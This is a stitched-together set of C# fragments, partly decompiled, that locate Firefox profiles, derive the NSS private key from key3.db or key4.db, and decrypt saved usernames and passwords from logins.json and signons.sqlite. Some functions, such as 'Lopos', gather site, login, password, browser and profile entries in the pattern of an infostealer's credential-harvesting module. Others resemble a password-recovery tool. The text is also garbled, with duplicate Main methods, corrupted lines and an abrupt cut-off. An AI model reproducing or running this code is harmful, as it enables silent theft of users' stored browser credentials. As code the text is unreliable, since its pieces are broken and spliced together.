// Token: 0x060000E8 RID: 232 RVA: 0x00007314 File Offset: 0x00005514
private static byte[] ExtractPrivateKey4(string file)
{
byte[] array = new byte[24];
try
{
Console.WriteLine("Key source file: " + file);
if (!File.Exists(file))
{
Console.WriteLine("Source file UNKNOWN");
return(array);
}
SQLiteManager sqliteManager = new SQLiteManager(file);
sqliteManager.ReadTable("metaData");
string value = sqliteManager.GetValue(0, "item1");
string value2 = sqliteManager.GetValue(0, "item2)");
Asn1DerObject asn1DerObject = new Asn1Der().Parse(Encoding.Default.GetBytes(value2));
byte[] data = asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data;
byte[] data2 = asn1DerObject.objects[0].objects[1].Data;
MozillaPBE mozillaPBE = new MozillaPBE(Encoding.Default.GetBytes(value), Encoding.Default.GetBytes(string.Empty), data);
mozillaPBE.Compute();
string input = TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, data2, PaddingMode.None);
Console.WriteLine(new string('=', 20));
Console.WriteLine("Global salt found for encrypt: [" + FirefoxBase.CalcHex(value) + "]");
Console.WriteLine("Entry salt found for encrypt: [" + FirefoxBase.CalcHex(data) + "]");
Console.WriteLine("СheckPwd key for encrypt : [" + FirefoxBase.CalcHex(mozillaPBE.Key) + "]");
Console.WriteLine("СheckPwd IV for encrypt: [" + FirefoxBase.CalcHex(mozillaPBE.IV) + "]");
Console.WriteLine("Decrypted chiper: [" + FirefoxBase.CalcHex(input) + "]");
Console.WriteLine(new string('=', 20));
sqliteManager.ReadTable("nssPrivate");
int rowCount = sqliteManager.GetRowCount();
string s = string.Empty;
for (int i = 0; i < rowCount; i++)
{
if (sqliteManager.GetValue(i, "a102") == Encoding.Default.GetString(FirefoxBase.MagicNumber1))
{
s = sqliteManager.GetValue(i, "a11");
break;
}
}
Asn1DerObject asn1DerObject2 = new Asn1Der().Parse(Encoding.Default.GetBytes(s));
data = asn1DerObject2.objects[0].objects[0].objects[1].objects[0].Data;
data2 = asn1DerObject2.objects[0].objects[1].Data;
mozillaPBE = new MozillaPBE(Encoding.Default.GetBytes(value), Encoding.Default.GetBytes(string.Empty), data);
mozillaPBE.Compute();
Console.WriteLine(new string('=', 20));
Console.WriteLine("ChiperT found after encrypt: [" + FirefoxBase.CalcHex(data2) + "]");
Console.WriteLine("Global salt found after encrypt: [" + FirefoxBase.CalcHex(value) + "]");
Console.WriteLine("Entry salt found after encrypt: [" + FirefoxBase.CalcHex(data) + "]");
Console.WriteLine("СheckPwd key after encrypt : [" + FirefoxBase.CalcHex(mozillaPBE.Key) + "]");
Console.WriteLine("СheckPwd IV after encrypt: [" + FirefoxBase.CalcHex(mozillaPBE.IV) + "]");
array = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, data2, PaddingMode.PKCS7));
Console.WriteLine("Decrypted private key: [" + FirefoxBase.CalcHex(array) + "]");
Console.WriteLine(new string('=', 20));
}
catch (Exception value3)
{
Console.WriteLine(value3);
}
return(array);
}
public static void Lopos(string profile, byte[] privateKey, string browser_name, string profile_name)
{
try
{
string path = CreateTempCopy(Path.Combine(profile, "logins.json"));
if (File.Exists(path))
{
{
foreach (JsonValue item in File.ReadAllText(path).FromJSON()["logins"])
{
GetPasswords.Cpassword++;
Asn1DerObject Gecko4 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedUsername"].ToString(saving: false)));
Asn1DerObject Gecko42 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedPassword"].ToString(saving: false)));
string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko4.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko4.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko42.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko42.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
credential.Add("Site_Url : " + item["hostname"] + Environment.NewLine + "Login : "******"Password : "******"Browser : " + browser_name + Environment.NewLine + "Profile : " + profile_name + Environment.NewLine + credential[i]);
}
credential.Clear();
}
}
}
catch (Exception)
{
}
}
public byte[] CheckKey4DB(string dir, string masterPwd, bool Verbose)
{
try
{
Asn1Der asn = new Asn1Der();
byte[] item2 = new byte[] { };
byte[] item1 = new byte[] { };
byte[] a11 = new byte[] { };
byte[] a102 = new byte[] { };
string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'";
if (Verbose)
{
Console.WriteLine("Fetch data from key4.db file");
}
GetItemsFromQuery(dir, ref item1, ref item2, query);
Asn1DerObject f800001 = asn.Parse(item2);
MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data);
if (!decryptedPwdChk.StartsWith("password-check"))
{
Console.WriteLine("Master password is wrong !");
return(null);
}
query = "SELECT a11,a102 FROM nssPrivate";
GetItemsFromQuery(dir, ref a11, ref a102, query);
var decodedA11 = asn.Parse(a11);
var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data;
var cipherT = decodedA11.objects[0].objects[1].Data;
if (Verbose)
{
Console.WriteLine("Fetch Private key");
}
return(decrypt3DES(item1, masterPwd, entrySalt, cipherT));
}
catch (Exception ex)
{
Console.WriteLine("Exeption:\n" + ex.Message);
return(null);
}
}
private static void Main()
{
Searcher.CopyLoginsInSafeDir();
Console.ReadLine();
string MasterPwd = string.Empty;
bool Verbose = false;
string filePath = string.Empty;
var dt = new DataTable();
var asn = new Asn1Der();
var db = new BerkeleyDB(Path.Combine(filePath, "key4.db"));
var pwdCheck = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""));
string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", "");
string f81 = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "");
var CheckPwd = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), MasterPassword.ConvertHexStringToByteArray(pwdCheck.EntrySalt));
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, MasterPassword.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));
Asn1DerObject f800001 = asn.Parse(MasterPassword.ConvertHexStringToByteArray(f81));
MozillaPBE CheckPrivateKey = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPrivateKey.Compute();
byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);
Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);
Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);
byte[] privateKey = new byte[24];
if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
{
Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
}
else
{
privateKey = f800001deriv2.objects[0].objects[3].Data;
}
}
private static byte[] P4k(string file)
{
byte[] result = new byte[24];
try
{
if (!File.Exists(file))
{
return(result);
}
var cNT = new CNT(file);
cNT.ReadTable("metaData");
string s = cNT.ParseValue(0, "item1");
string s2 = cNT.ParseValue(0, "item2)");
Asn1DerObject ansobjectS2 = Asn1Der.Parse(Encoding.Default.GetBytes(s2));
byte[] objectData = ansobjectS2.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData();
byte[] objectData2 = ansobjectS2.Objects[0].Objects[1].GetObjectData();
var inizialize = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData);
inizialize.Compute();
TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2);
cNT.ReadTable("nssPrivate");
int rowLength = cNT.RowLength;
string s3 = string.Empty;
for (int i = 0; i < rowLength; i++)
{
if (cNT.ParseValue(i, "a102") == Encoding.Default.GetString(Key4MagicNumber))
{
s3 = cNT.ParseValue(i, "a11");
break;
}
}
Asn1DerObject ansobjectS3 = Asn1Der.Parse(Encoding.Default.GetBytes(s3));
objectData = ansobjectS3.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData();
objectData2 = ansobjectS3.Objects[0].Objects[1].GetObjectData();
inizialize = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData);
inizialize.Compute();
result = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2, PaddingMode.PKCS7));
return(result);
}
catch (Exception)
{
return(result);
}
}
// Token: 0x060000E9 RID: 233 RVA: 0x000076D8 File Offset: 0x000058D8
private static byte[] ExtractPrivateKey3(string file)
{
byte[] array = new byte[24];
try
{
Console.WriteLine("Key source file: " + file);
if (!File.Exists(file))
{
Console.WriteLine("Source file UNKNOWN");
return(array);
}
new DataTable();
Asn1Der asn1Der = new Asn1Der();
BerkeleyDB berkeleyDB = new BerkeleyDB(file);
PasswordCheck passwordCheck = new PasswordCheck(FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("password-check")));
string hexString = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("global-salt"));
MozillaPBE mozillaPBE = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
mozillaPBE.Compute();
TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None);
string hexString2 = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"));
Asn1DerObject asn1DerObject = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2));
MozillaPBE mozillaPBE2 = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data);
mozillaPBE2.Compute();
byte[] bytes = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(mozillaPBE2.Key, mozillaPBE2.IV, asn1DerObject.objects[0].objects[1].Data, PaddingMode.None));
Asn1DerObject asn1DerObject2 = asn1Der.Parse(bytes);
Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data);
if (asn1DerObject3.objects[0].objects[3].Data.Length > 24)
{
Array.Copy(asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, array, 0, 24);
}
else
{
array = asn1DerObject3.objects[0].objects[3].Data;
}
}
catch
{
}
return(array);
}
private static byte[] P3k(string file)
{
byte[] array = new byte[24];
try
{
if (!File.Exists(file))
{
return(array);
}
new DataTable();
var berkeleyDB = new BerkeleyDB(file);
var Gecko7 = new PasswordCheck(ValueDB(berkeleyDB, (string x) => x.Equals("password-check")));
string hexString = ValueDB(berkeleyDB, (string x) => x.Equals("global-salt"));
var Gecko8 = new MozillaPBE(ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ConvertHexStringToByteArray(Gecko7.EntrySalt));
Gecko8.Compute();
TripleDESHelper.DESCBCDecryptor(Gecko8.GetKey(), Gecko8.GetIV(), ConvertHexStringToByteArray(Gecko7.Passwordcheck));
Asn1DerObject Gecko4 = Asn1Der.Parse(ConvertHexStringToByteArray(ValueDB(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"))));
var Gecko82 = new MozillaPBE(ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), Gecko4.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData());
Gecko82.Compute();
Asn1DerObject Gecko42 = Asn1Der.Parse(Asn1Der.Parse(Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(Gecko82.GetKey(), Gecko82.GetIV(), Gecko4.Objects[0].Objects[1].GetObjectData()))).Objects[0].Objects[2].GetObjectData());
if (Gecko42.Objects[0].Objects[3].GetObjectData().Length <= 24)
{
array = Gecko42.Objects[0].Objects[3].GetObjectData();
return(array);
}
Array.Copy(Gecko42.Objects[0].Objects[3].GetObjectData(), Gecko42.Objects[0].Objects[3].GetObjectData().Length - 24, array, 0, 24);
return(array);
}
catch (Exception)
{
return(array);
}
}
private byte[] CheckKey4DB(string dir, string masterPwd)
{
try
{
ErrorHandle eh = new ErrorHandle();
Asn1Der asn = new Asn1Der();
byte[] item2 = new byte[] { };
byte[] item1 = new byte[] { };
byte[] a11 = new byte[] { };
byte[] a102 = new byte[] { };
string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'";
GetItemsFromQuery(dir, ref item1, ref item2, query);
Asn1DerObject f800001 = asn.Parse(item2);
MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data);
if (!decryptedPwdChk.StartsWith("password-check"))
{
eh.ErrorFunc("Master password is wrong !");
return(null);
}
query = "SELECT a11,a102 FROM nssPrivate";
GetItemsFromQuery(dir, ref a11, ref a102, query);
var decodedA11 = asn.Parse(a11);
var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data;
var cipherT = decodedA11.objects[0].objects[1].Data;
return(decrypt3DES(item1, masterPwd, entrySalt, cipherT));
}
catch (Exception ex)
{
return(null);
}
}
// Token: 0x060000E5 RID: 229 RVA: 0x00007090 File Offset: 0x00005290
private static IEnumerable <BrowserCredendtial> ExtractLogins(string profile, byte[] privateKey)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string path = ChromiumManager.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (!File.Exists(path))
{
return(list);
}
RootLogin rootLogin = File.ReadAllText(path).FromJSON <RootLogin>();
Asn1Der asn1Der = new Asn1Der();
foreach (LoginJson loginJson in rootLogin.logins)
{
Asn1DerObject asn1DerObject = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedUsername));
Asn1DerObject asn1DerObject2 = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedPassword));
string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject.objects[0].objects[1].objects[1].Data, asn1DerObject.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject2.objects[0].objects[1].objects[1].Data, asn1DerObject2.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
BrowserCredendtial browserCredendtial = new BrowserCredendtial
{
URL = (string.IsNullOrEmpty(loginJson.hostname) ? "UNKNOWN" : loginJson.hostname),
Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
};
if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch (Exception value)
{
Console.WriteLine(value);
}
return(list);
}
private static void ParseLogins(string directory, string userName, string masterPassword = "")
{
// Read berkeleydb
Asn1Der asn = new Asn1Der();
BerkeleyDB db = new BerkeleyDB(Path.Combine(directory, "key3.db"));
PasswordCheck pwdCheck = new PasswordCheck(db.GetValueOfKey("password-check").Replace("-", ""));
//string GlobalSalt = (from p in db.Keys
// where p.Key.Equals("global-salt")
// select p.Value).FirstOrDefault().Replace("-", "");
string GlobalSalt = db.GetValueOfKey("global-salt").Replace("-", "");
MozillaPBE CheckPwd = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(masterPassword), ByteHelper.ConvertHexStringToByteArray(pwdCheck.EntrySalt));
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, ByteHelper.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));
if (!decryptedPwdChk.StartsWith("password-check"))
{
Console.WriteLine("Master password is wrong; cannot decrypt FireFox logins.");
return;
}
// Get private key
string f81 = String.Empty;
String[] blacklist = { "global-salt", "Version", "password-check" };
foreach (var k in db.Keys)
{
if (Array.IndexOf(blacklist, k.Key) == -1)
{
f81 = k.Value.Replace("-", "");
}
}
if (f81 == String.Empty)
{
Console.WriteLine("[X] Could not retrieve private key.");
return;
}
Asn1DerObject f800001 = asn.Parse(ByteHelper.ConvertHexStringToByteArray(f81));
MozillaPBE CheckPrivateKey = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(masterPassword), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPrivateKey.Compute();
byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);
Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);
Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);
byte[] privateKey = new byte[24];
if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
{
Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
}
else
{
privateKey = f800001deriv2.objects[0].objects[3].Data;
}
// decrypt username and password
string loginsJsonPath = String.Format("{0}\\{1}", directory, "logins.json");
Login[] logins = ParseLoginFile(loginsJsonPath);
if (logins.Length == 0)
{
Console.WriteLine("No logins discovered from logins.json");
return;
}
foreach (Login login in logins)
{
Asn1DerObject user = asn.Parse(Convert.FromBase64String(login.encryptedUsername));
Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(login.encryptedPassword));
string hostname = login.hostname;
string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);
Console.WriteLine("--- FireFox Credential (User: {0}) ---", userName);
Console.WriteLine("Hostname: {0}", hostname);
Console.WriteLine("Username: {0}", Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""));
Console.WriteLine("Password: {0}", Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""));
Console.WriteLine();
}
}
private byte[] CheckKey3DB(string filePath, string MasterPwd)
{
try
{
Converts conv = new Converts();
ErrorHandle eh = new ErrorHandle();
Asn1Der asn = new Asn1Der();
BerkeleyDB db = new BerkeleyDB(Path.Combine(filePath, "key3.db"));
// Verify MasterPassword
PasswordCheck pwdCheck = new PasswordCheck((from p in db.Keys
where p.Key.Equals("password-check")
select p.Value).FirstOrDefault().Replace("-", ""));
string GlobalSalt = (from p in db.Keys
where p.Key.Equals("global-salt")
select p.Value).FirstOrDefault().Replace("-", "");
MozillaPBE CheckPwd = new MozillaPBE(conv.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), conv.ConvertHexStringToByteArray(pwdCheck.EntrySalt));
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, conv.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));
if (!decryptedPwdChk.StartsWith("password-check"))
{
eh.ErrorFunc("Master password is wrong !");
return(null);
}
// Get private key
string f81 = (from p in db.Keys
where !p.Key.Equals("global-salt") &&
!p.Key.Equals("Version") &&
!p.Key.Equals("password-check")
select p.Value).FirstOrDefault().Replace("-", "");
Asn1DerObject f800001 = asn.Parse(conv.ConvertHexStringToByteArray(f81));
MozillaPBE CheckPrivateKey = new MozillaPBE(conv.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPrivateKey.Compute();
byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);
Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);
Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);
byte[] privateKey = new byte[24];
if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
{
Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
}
else
{
privateKey = f800001deriv2.objects[0].objects[3].Data;
}
return(privateKey);
}
catch (Exception ex)
{
return(null);
}
}
public List <LoginFieldS> FetchPassword()
{
try
{
byte[] privateKey = new byte[24];
bool loginsFound = false, signonsFound = false;
string signonsFile = string.Empty, loginsFile = string.Empty;;
ErrorHandle eh = new ErrorHandle();
string MasterPwd = string.Empty;
string filePath = string.Empty;
Converts conv = new Converts();
// Read berkeleydb
DataTable dt = new DataTable();
Asn1Der asn = new Asn1Der();
List <LoginFieldS> lp = new List <LoginFieldS>();
var ffPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles");
if (!Directory.Exists(ffPath))
{
return(lp);
}
var dirs = Directory.GetDirectories(ffPath);
foreach (string dir in dirs)
{
try
{
string[] files = Directory.GetFiles(dir, "signons.sqlite");
if (files.Length > 0)
{
filePath = dir;
signonsFile = files[0];
signonsFound = true;
}
// find logins.json file
files = Directory.GetFiles(dir, "logins.json");
if (files.Length > 0)
{
filePath = dir;
loginsFile = files[0];
loginsFound = true;
}
if (!loginsFound && !signonsFound)
{
eh.ErrorFunc("File signons & logins not found.");
continue;
}
if (filePath == string.Empty)
{
eh.ErrorFunc("Mozilla not found.");
continue;
}
// Check if files exists
if (!File.Exists(Path.Combine(filePath, "key3.db")))
{
privateKey = CheckKey4DB(dir, MasterPwd);
}
else
{
privateKey = CheckKey3DB(dir, MasterPwd);
}
if (privateKey == null || privateKey.Length == 0)
{
eh.ErrorFunc("Private key return null");
continue;
}
// decrypt username and password
FFLogins ffLoginData;
DataBase dbLocal = new DataBase();
if (signonsFound)
{
using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite")))
{
cnn.Open();
SQLiteCommand mycommand = new SQLiteCommand(cnn);
mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;";
SQLiteDataReader reader = mycommand.ExecuteReader();
dt.Load(reader);
}
foreach (DataRow row in dt.Rows)
{
try
{
Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString()));
Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString()));
string hostname = row["hostname"].ToString();
string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);
string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "").GetUTF8String(64);
string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "").GetUTF8String(64);
string title = HIOStaticValues.getTitleNameURI(hostname).GetUTF8String(64);
string url = HIOStaticValues.getDomainNameURI(hostname).GetUTF8String(256);
if (dbLocal.getInfoFromDB(url, username, "").Count == 0)
{
lp.Add(new LoginFieldS {
url = url, userName = username, password = password, title = title
});
}
}
catch (Exception ex)
{
continue;
}
}
}
if (loginsFound)
{
using (StreamReader sr = new StreamReader(Path.Combine(filePath, "logins.json")))
{
string json = sr.ReadToEnd();
ffLoginData = JsonConvert.DeserializeObject <FFLogins>(json);
}
foreach (LoginData loginData in ffLoginData.logins)
{
try
{
Asn1DerObject user = asn.Parse(Convert.FromBase64String(loginData.encryptedUsername));
Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(loginData.encryptedPassword));
string hostname = loginData.hostname;
string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);
string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "").GetUTF8String(64);
string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "").GetUTF8String(64);
string title = HIOStaticValues.getTitleNameURI(hostname).GetUTF8String(64);
string url = HIOStaticValues.getDomainNameURI(hostname).GetUTF8String(256);
if (dbLocal.getInfoFromDB(url, username, "").Count == 0)
{
lp.Add(new LoginFieldS {
url = url, userName = username, password = password, title = title
});
}
}
catch (Exception ex)
{
continue;
}
}
}
}
catch (Exception ex) {
continue;
}
}
return(lp);
}
catch (Exception ex)
{
throw ex;
}
}
public static int Main(string[] args)
{
string MasterPwd = string.Empty;
bool Verbose = false;
string filePath = string.Empty;
//Manage args
for (int i = 0; i < args.Length; i++)
{
if (args[i].Equals("-p"))
{
MasterPwd = args[i + 1];
}
if (args[i].Equals("-f"))
{
filePath = args[i + 1];
}
if (args[i].Equals("-v"))
{
Verbose = true;
}
if (args[i].Equals("-h"))
{
Console.WriteLine("FirePwd.Net v0.1");
Console.WriteLine("Usage :");
Console.WriteLine("\t -p to specify Master Password");
Console.WriteLine("\t -v to activate verbose mode");
Console.WriteLine("\t -f to specify path for files key3.db and signons.sqlite");
return(0);
}
}
// Check if files exists
if (!File.Exists(Path.Combine(filePath, "key3.db")))
{
Console.WriteLine("File key3.db not found.");
return(0);
}
if (!File.Exists(Path.Combine(filePath, "signons.sqlite")))
{
Console.WriteLine("File key3.db not found.");
return(0);
}
// Read berkeleydb
DataTable dt = new DataTable();
Asn1Der asn = new Asn1Der();
BerkeleyDB db = new BerkeleyDB(Path.Combine(filePath, "key3.db"));
if (Verbose)
{
Console.WriteLine(db.Version);
}
// Verify MasterPassword
PasswordCheck pwdCheck = new PasswordCheck((from p in db.Keys
where p.Key.Equals("password-check")
select p.Value).FirstOrDefault().Replace("-", ""));
string GlobalSalt = (from p in db.Keys
where p.Key.Equals("global-salt")
select p.Value).FirstOrDefault().Replace("-", "");
if (Verbose)
{
Console.WriteLine("GlobalSalt = " + GlobalSalt);
Console.WriteLine("EntrySalt = " + pwdCheck.EntrySalt);
}
MozillaPBE CheckPwd = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), ByteHelper.ConvertHexStringToByteArray(pwdCheck.EntrySalt));
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, ByteHelper.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));
if (!decryptedPwdChk.StartsWith("password-check"))
{
Console.WriteLine("Master password is wrong !");
return(0);
}
// Get private key
string f81 = (from p in db.Keys
where !p.Key.Equals("global-salt") &&
!p.Key.Equals("Version") &&
!p.Key.Equals("password-check")
select p.Value).FirstOrDefault().Replace("-", "");
Asn1DerObject f800001 = asn.Parse(ByteHelper.ConvertHexStringToByteArray(f81));
if (Verbose)
{
Console.WriteLine("F800001");
Console.WriteLine(f800001.ToString());
}
MozillaPBE CheckPrivateKey = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPrivateKey.Compute();
byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);
Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);
if (Verbose)
{
Console.WriteLine("F800001 first derivation");
Console.WriteLine(f800001deriv1.ToString());
}
Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);
if (Verbose)
{
Console.WriteLine("F800001 second derivation");
Console.WriteLine(f800001deriv2.ToString());
}
byte[] privateKey = new byte[24];
if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
{
Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
}
else
{
privateKey = f800001deriv2.objects[0].objects[3].Data;
}
if (Verbose)
{
Console.WriteLine("Private key = " + privateKey.ToString());
}
// decrypt username and password
using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite")))
{
cnn.Open();
SQLiteCommand mycommand = new SQLiteCommand(cnn);
mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;";
SQLiteDataReader reader = mycommand.ExecuteReader();
dt.Load(reader);
}
